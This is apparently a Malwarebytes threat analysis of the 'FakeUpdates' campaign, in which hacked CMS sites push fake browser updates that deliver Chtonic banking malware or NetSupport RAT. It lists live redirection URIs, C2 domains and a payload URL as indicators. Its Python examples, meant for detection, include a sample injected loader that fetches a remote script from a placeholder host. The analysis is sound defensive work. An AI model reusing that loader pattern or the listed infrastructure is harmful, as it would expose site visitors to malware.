URL: https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/
Social engineering | Threat analysis


‘FAKEUPDATES’ CAMPAIGN LEVERAGES MULTIPLE WEBSITE PLATFORMS

Posted: April 10, 2018 by Jérôme Segura
Last updated: November 15, 2018

Browser update? Do not trust, and do verify before downloading potential
malware.

A malware campaign that appears to have been running since at least December
2017 has been gaining steam by enrolling a growing number of legitimate but
compromised websites. Its modus operandi relies on social engineering users
with fake but convincing update notifications.

Similar techniques were used by a group leveraging malvertising on high traffic
websites such as Yahoo to distribute ad fraud malware. The patterns are also
somewhat reminiscent of EITest’s HoeflerText campaign where hacked websites are
scrambled and offer a font for download. More recently, there has been a
campaign affecting Magento websites that also pushes fake updates (for the Flash
Player) which delivers the AZORult stealer by abusing GitHub for hosting.

Today, we are looking at what we call the ‘FakeUpdates campaign’ and describing
its intricate filtering and evasion techniques. One of the earliest examples we
could find was reported by BroadAnalysis on December 20, 2017. The update file
is not an executable but rather a script, downloaded from Dropbox, a legitimate
file hosting service, as can be seen in the animation below.



Figure 1: A typical redirection to the ‘FakeUpdates’ scheme from a hacked site

This campaign affects multiple Content Management Systems (CMS) in somewhat
similar ways. Several of the websites we checked were outdated and therefore
vulnerable to malicious code injection. It is possible that attackers used the
same techniques to build their inventory of compromised sites but we do not have
enough information to confirm this theory.


WORDPRESS AND JOOMLA

Both WordPress and Joomla sites that were hacked bear the same kind of injection
within their CMS’ JavaScript files.



Figure 2: A Compromised WordPress site pushing a fake Google Chrome update



Figure 3: A Compromised Joomla site pushing a fake Mozilla Firefox update

Some commonly injected files include the jquery.js and caption.js libraries
where code is typically appended and can be spotted by doing a comparison with a
clean copy of the same file.



Figure 4: Diffing a clean and suspicious copy of the same library

The additional blurb of code is responsible for the next chain of events that
loads the fraudulent layer onto the website you are visiting. The image below
shows a beautified version of the code injected in the CMS platforms, whose goal
is to call the redirection URL:



Figure 5: Injected code responsible for the redirection

We wrote a simple crawler to browse a list of sites and then parsed the results.
We were able to identify several hundred compromised WordPress and Joomla
websites after only a partial pass through the list. Although we don’t have an
exact number of affected sites, we surmise that it is in the thousands.



Figure 6: A partial list of compromised sites
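The comparison against a clean copy described above is easy to automate for a site owner. The following is an added example (not Malwarebytes’ crawler or any code from the article): it hashes the served library against a pristine reference, extracts whatever lines were appended, and checks them for the `s_code.js?cid=…&v=…` loader shape the campaign uses. Both library texts are constructed; the host `track.invalid` is a placeholder, not one of the campaign’s domains.

```python
"""Integrity check for a CMS JavaScript library: compare the copy a site
serves with a clean reference and report appended code plus any redirection
marker it carries.  Added example; not Malwarebytes' own tooling."""
import difflib
import hashlib
import re

# Constructed sample data.  CLEAN_JS stands in for a pristine library such as
# jquery.js; SUSPECT_JS is the same file with a trailing loader appended.
# "track.invalid" is a reserved placeholder host; only the
# s_code.js?cid=...&v=... shape mirrors the URIs reported in the article.
CLEAN_JS = (
    "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors */\n"
    "!function(e,t){\"use strict\";t(e)}(window,function(e){e.jQuery=e.$={}});\n"
)
INJECTED_TAIL = (
    "var s=document.createElement('script');"
    "s.src='//track.invalid/s_code.js?cid=221&v=8fdbe4223f0230a93678';"
    "document.head.appendChild(s);\n"
)
SUSPECT_JS = CLEAN_JS + INJECTED_TAIL

# cid/v pair shape seen across the WordPress, Joomla and Squarespace samples
MARKER_RE = re.compile(r"s_code\.js\?cid=(\d+)&v=([0-9a-f]{20})")


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def added_lines(clean: str, suspect: str) -> list:
    """Lines present in the suspect copy but absent from the clean reference."""
    diff = difflib.unified_diff(
        clean.splitlines(), suspect.splitlines(), lineterm="", n=0
    )
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def redirect_markers(js: str) -> list:
    """Return (cid, v) pairs for every s_code.js loader found in the text."""
    return MARKER_RE.findall(js)


def audit_library(clean: str, suspect: str) -> dict:
    """Summarise how the served copy differs from the clean reference."""
    modified = sha256_hex(clean) != sha256_hex(suspect)
    extra = added_lines(clean, suspect) if modified else []
    return {
        "modified": modified,
        "added_lines": extra,
        "markers": redirect_markers("\n".join(extra)),
    }


if __name__ == "__main__":
    result = audit_library(CLEAN_JS, SUSPECT_JS)
    print("modified:", result["modified"])
    for line in result["added_lines"]:
        print("appended:", line[:80])
    for cid, v in result["markers"]:
        print(f"redirect marker cid={cid} v={v}")
```

In practice the clean reference is the file from the CMS or library release archive at the exact version the site runs; a hash mismatch alone is the alert, and the appended lines tell you what was added.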


SQUARESPACE

Squarespace is another popular Content Management System that is also affected
by the same campaign. This was pointed out by @Ring0x0 and we found a forum post
dated February 28, where a Squarespace user is asking for help, saying “it
basically redirected me to a full page ‘your version of chrome needs updating’”.



Figure 7: A Squarespace user reporting that their site was tampered with

So I login to the admin panel and in the GIT HISTORY it shows that one of my
users which has never even logged in before, has sent an upload: site-bundle.js
last week, along with some other big list of files {sic}.

We dug deeper into these compromises and identified a slightly different
redirection mechanism than the one used on WordPress or Joomla sites. With
Squarespace, a blurb of JavaScript is injected directly into the site’s homepage
instead.



Figure 8: Traffic showing a malicious redirection taking place on a Squarespace
site

It pulls a source file from query[.]network that in turn retrieves bundle.js
from boobahbaby[.]com:



Figure 9: The injected code present in hacked Squarespace sites 

bundle.js contains the same script we described earlier that is used to call the
redirection URL:



Figure 10: The same redirection code used in WP and Joomla infections is used
here

According to this PublicWWW query, a little over 900 Squarespace sites have been
injected with this malicious redirection code.



Figure 11: Identifying other hacked Squarespace sites using a string pattern


REDIRECTION URL AND FILTERING

All CMSes trigger redirection URIs with similar patterns that eventually load
the fraudulent update theme. Based on our tests, the URIs carry identifiers that
apply to a particular CMS; for example, cid=221 is associated with WordPress
sites, while cid=208 is associated with Joomla.

WordPress 
track.positiverefreshment[.]org/s_code.js?cid=221&v=8fdbe4223f0230a93678
track.positiverefreshment.org/s_code.js?cid=225&v=0bbea7365fbb07c7acb3 
track.amishbrand[.]com/s_code.js?cid=205&v=c40bfeff70a8e1abc00f 
track.amishbrand.com/s_code.js?cid=228&v=e8bfa92965d1d880bac2 
track.amishbrand[.]com/s_code.js?cid=234&v=59f4ba6c3cd7f37abedc 
track.amishbrand[.]com/s_code.js?cid=237&v=7e3403034b8bf0ac23c6 

Joomla 
connect.clevelandskin[.]com/s_code.js?cid=208&v=e1acdea1ea51b0035267 
track.positiverefreshment[.]org/s_code.js?cid=220&v=24eca7c911f5e102e2ba 
track.amishbrand[.]com/s_code.js?cid=226&v=4d25aa10a99a45509fa2 

Squarespace 
track.amishbrand[.]com/s_code.js?cid=232&v=47acc84c33bf85c5496d 

Open Journal Systems 
track.positiverefreshment[.]org/s_code.js?cid=223&v=7124cc38a60ff6cb920d 

Unknown CMS 
track.positiverefreshment[.]org/s_code.js?cid=211&v=7c6b1d9ec5023db2b7d9 
track.positiverefreshment[.]org/s_code.js?cid=227&v=a414ad4ad38395fc3c3b
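For a network defender, the URI shape above is the most useful artifact: a request for `s_code.js?cid=<number>&v=<20 hex chars>` is unusual enough to hunt for in proxy logs. The following is an added example, not tooling from the article, that parses constructed proxy log lines, matches that shape, labels the cid with the CMS attribution tabulated above, and rates a hit on one of the redirection hosts named in this post higher than a bare pattern match on an unknown host. The log format and client addresses are constructed; the `.test` hosts are placeholders.

```python
"""Flag requests to the FakeUpdates redirection URIs in web-proxy logs and
label the CMS each cid identifier maps to.  Added example, not the article's
own tooling; the log lines below are constructed."""
import re
from collections import Counter

# cid -> CMS, exactly as tabulated in the article (cids listed there under
# "Unknown CMS" keep that label)
CID_TO_CMS = {
    **dict.fromkeys(("221", "225", "205", "228", "234", "237"), "WordPress"),
    **dict.fromkeys(("208", "220", "226"), "Joomla"),
    "232": "Squarespace",
    "223": "Open Journal Systems",
    "211": "unknown CMS",
    "227": "unknown CMS",
}

# redirection hosts named in the article (defanging brackets removed so they
# match what a proxy actually logged)
KNOWN_HOSTS = {
    "track.positiverefreshment.org",
    "track.amishbrand.com",
    "connect.clevelandskin.com",
    "connect.clevelandskin.net",
    "connect.clevelandskin.org",
}

URI_RE = re.compile(
    r"https?://(?P<host>[^/\s:]+)(?::\d+)?/s_code\.js"
    r"\?cid=(?P<cid>\d+)&v=(?P<v>[0-9a-f]{20})"
)

# Constructed proxy log lines: "<time> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2018-04-09T10:02:11Z 10.0.0.12 GET https://intranet.example-corp.test/index.php 200
2018-04-09T10:02:12Z 10.0.0.12 GET https://track.positiverefreshment.org/s_code.js?cid=221&v=8fdbe4223f0230a93678 200
2018-04-09T10:05:40Z 10.0.0.33 GET https://connect.clevelandskin.com/s_code.js?cid=208&v=e1acdea1ea51b0035267 200
2018-04-09T10:07:03Z 10.0.0.33 GET https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js 200
2018-04-09T10:09:55Z 10.0.0.51 GET https://stats.unrelated-host.test/s_code.js?cid=999&v=0123456789abcdef0123 200
"""


def classify(url: str):
    """Return a finding dict for a redirection URI, or None for benign URLs."""
    m = URI_RE.search(url)
    if not m:
        return None
    host, cid = m.group("host"), m.group("cid")
    return {
        "host": host,
        "cid": cid,
        "v": m.group("v"),
        "cms": CID_TO_CMS.get(cid, "cid not in published list"),
        # a known host is a hard IoC match; the bare URI shape alone is weaker
        "confidence": "high" if host in KNOWN_HOSTS else "medium",
    }


def scan_log(text: str) -> list:
    """Parse the constructed proxy lines and collect findings per client."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        ts, client, _method, url, _status = parts[:5]
        f = classify(url)
        if f:
            f.update({"time": ts, "client": client})
            findings.append(f)
    return findings


def affected_clients(findings: list) -> Counter:
    """Which internal clients touched the infrastructure, and how often."""
    return Counter(f["client"] for f in findings)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['time']} {h['client']} -> {h['host']} cid={h['cid']} "
              f"({h['cms']}, {h['confidence']} confidence)")
    print(affected_clients(hits))
```

Because the article notes that each IP address is only served the fake update page once, a single matching request from a client is already worth triaging; the client list is the pivot to the endpoints that need a look.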

There are other interesting artifacts on this infrastructure, such as an ad
rotator:

track.positiverefreshment.net:81/adrotator/banner.js?cid=100

But if we focus on the redirection code itself, we notice that potential victims
are fingerprinted and the ultimate redirection to the FakeUpdates template is
conditional; in particular, each IP address is served only once. The last
JavaScript is responsible for creating the iframe URL to that next sequence.



Figure 12: Fingerprinting, cookie verification and iframe redirection are
performed here


FAKEUPDATES THEME

There are templates for the Chrome, Firefox and Internet Explorer browsers, the
latter getting a bogus Flash Player update instead.



Figure 13: Attackers are targeting browsers with professional looking templates

The decoy pages are hosted on compromised hosts via sub-domains, using URIs with
very short life spans. Some of those domains host a live (and legitimate)
website, whereas others are simply parked:

Legitimate (shadowed) domain:

https://pask.spgolfshoes[.]com/95b40f61578eed04ff464c5055990abbupdate{trimmed}



Figure 14: This property’s credentials have most likely been stolen and used to
register a malicious subdomain

Parked domain:

http://zlsk.redneckonize[.]com/wordpress/article.php?f=445327&g={trimmed}



Figure 15: Parked domains can hide ulterior motives


FINAL INFECTION CHAIN AND PAYLOADS

The infection starts with the fake update disguised as a JavaScript file
retrieved from the Dropbox file hosting service. The link to Dropbox, which is
updated at regular intervals, is obfuscated inside the first web session
belonging to the fake theme.


Figure 16: the fileURL variable contains the Dropbox URL

This JavaScript is heavily obfuscated to make static analysis very difficult and
also to hide some crucial fingerprinting that is designed to evade virtual
machines and sandboxes.



Figure 17: The malicious JavaScript downloaded from Dropbox

According to this very good and detailed analysis of the JS file, step 2 of the
victim’s profiling uses WScript.Network and WMI to collect system information
(BIOS, manufacturer, architecture, MAC address, running processes, etc.) and then
decides whether to continue with the payload or end the script without
delivering it.

A failed infection generates only 2 callbacks to the C2 server:



Figure 18: A host that is not a genuine machine was detected and infection
aborted

A successful infection, by contrast, generates 3 callbacks to the C2 server
(including the payload):



Figure 19: When all checks pass, the user is served the payload

The encoded payload stream is decoded by wscript.exe, and a malicious binary
(Chrome_71.1.43.exe in this case) is dropped in the %temp% folder. That file was
digitally signed and also employed various evasion techniques (such as an
immediate reboot) to defeat sandboxes.



Figure 20: A digitally signed file is no guarantee for safety
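The last stage described above (wscript.exe decoding the payload, writing an executable into %temp% and running it) is the part of the chain an endpoint sensor sees most clearly, and it does not depend on the signer or the file name. The following is an added example, not a Malwarebytes detection: three small rules evaluated over constructed Sysmon-shaped events (EventID 11 for file creation, EventID 1 for process creation). The user name, the paths and the `Chrome_71.1.43.js` name are placeholders; only the dropped `Chrome_71.1.43.exe` name comes from the article.

```python
"""Detection logic for the last stage of the chain: a script host
(wscript.exe / cscript.exe) writing an executable into %TEMP% and then
launching it.  Added example, not Malwarebytes' detection; the events below
are constructed in a Sysmon-like shape (EventID 11 = FileCreate,
EventID 1 = ProcessCreate)."""
import re
from typing import Iterable

SCRIPT_HOSTS = ("\\wscript.exe", "\\cscript.exe")
BROWSERS = ("\\chrome.exe", "\\firefox.exe", "\\iexplore.exe")
TEMP_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.IGNORECASE)

# Constructed events.  The dropped file name echoes the Chrome_71.1.43.exe
# sample named in the article; the user name, the .js name and the other
# paths are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "CommandLine": "wscript.exe C:\\Users\\alice\\Downloads\\Chrome_71.1.43.js"},
    {"EventID": 11, "Image": "C:\\Windows\\System32\\wscript.exe",
     "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Temp\\Chrome_71.1.43.exe"},
    {"EventID": 1, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\Chrome_71.1.43.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "C:\\Users\\alice\\AppData\\Local\\Temp\\Chrome_71.1.43.exe"},
    {"EventID": 11, "Image": "C:\\Windows\\System32\\notepad.exe",
     "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Temp\\notes.txt"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "wscript.exe C:\\Scripts\\logon.vbs"},
]


def is_script_host(image: str) -> bool:
    return image.lower().endswith(SCRIPT_HOSTS)


def rule_script_host_drops_exe(ev: dict) -> bool:
    """FileCreate of a .exe under %TEMP% by wscript/cscript."""
    return (ev.get("EventID") == 11
            and is_script_host(ev.get("Image", ""))
            and TEMP_EXE_RE.search(ev.get("TargetFilename", "")) is not None)


def rule_script_host_spawns_temp_exe(ev: dict) -> bool:
    """ProcessCreate of a %TEMP% executable whose parent is wscript/cscript."""
    return (ev.get("EventID") == 1
            and is_script_host(ev.get("ParentImage", ""))
            and TEMP_EXE_RE.search(ev.get("Image", "")) is not None)


def rule_browser_launches_script_host(ev: dict) -> bool:
    """ProcessCreate of wscript/cscript directly under a web browser: the
    user opening the downloaded 'update' script from the browser."""
    return (ev.get("EventID") == 1
            and is_script_host(ev.get("Image", ""))
            and ev.get("ParentImage", "").lower().endswith(BROWSERS))


RULES = {
    "browser_launches_script_host": rule_browser_launches_script_host,
    "script_host_drops_exe_in_temp": rule_script_host_drops_exe,
    "script_host_spawns_temp_exe": rule_script_host_spawns_temp_exe,
}


def evaluate(events: Iterable[dict]) -> list:
    """Return (rule_name, event) for every event that trips a rule."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, ev in evaluate(SAMPLE_EVENTS):
        target = ev.get("TargetFilename") or ev.get("CommandLine")
        print(f"[{name}] {ev.get('Image')} -> {target}")
```

The logon script in the last sample event (wscript.exe under explorer.exe, no file drop) is there to show the rules staying quiet on ordinary administrative scripting; the signal is the combination of script host, %temp% and a fresh executable, not wscript.exe on its own.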

Upon examination, we determined that this is the Chtonic banking malware, a
variant of ZeusVM. Once the system has restarted, Chtonic retrieves a hefty
configuration file from 94.100.18[.]6/3.bin.

In a second replay attempt, we got the NetSupport Remote Access Tool, a
commercial RAT, instead. Its installation and configuration were already well
covered in this blog. Once again, we noticed the heavy use of obfuscation
throughout the delivery of this program, which can be used for malicious purposes
(file transfer, remote desktop, etc.).



Figure 21: Traffic from the RAT infection, showing its backend server


CONCLUSION

This campaign relies on a delivery mechanism that leverages social engineering
and abuses a legitimate file hosting service. The ‘bait’ file consists of a
script rather than a malicious executable, giving the attackers the flexibility
to develop interesting obfuscation and fingerprinting techniques.

Compromised websites were abused to not only redirect users but also to host the
fake updates scheme, making their owners unwitting participants in a malware
campaign. This is why it is so important to keep Content Management Systems up
to date, as well as use good security hygiene when it comes to authentication.

Malwarebytes blocks the domains and servers used in this attack, as well as the
final payload.


INDICATORS OF COMPROMISE

Redirection infrastructure:

23.152.0[.]118
84.200.84[.]236
185.243.112[.]38
185.77.129.11
eventsbysteph[.]com
query[.]network
connect.clevelandskin[.]net
connect.clevelandskin[.]org
track.amishbrand[.]com
track.positiverefreshment[.]org
link.easycounter210[.]com
click.clickanalytics208[.]com


C2

my.gobiox[.]com
login3.kimbrelelectric[.]com (thanks @nao_sec)

Dropped binaries:

Chtonic

6f3b0068793b277f1d948e11fe1a1d1c1aa78600712ec91cd0c0e83ed2f4cf1f
94.100.18[.]6/3.bin

NetSupport RAT

4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87


ABOUT THE AUTHOR

Jérôme Segura
Director of Threat Intelligence

A special interest for web threats.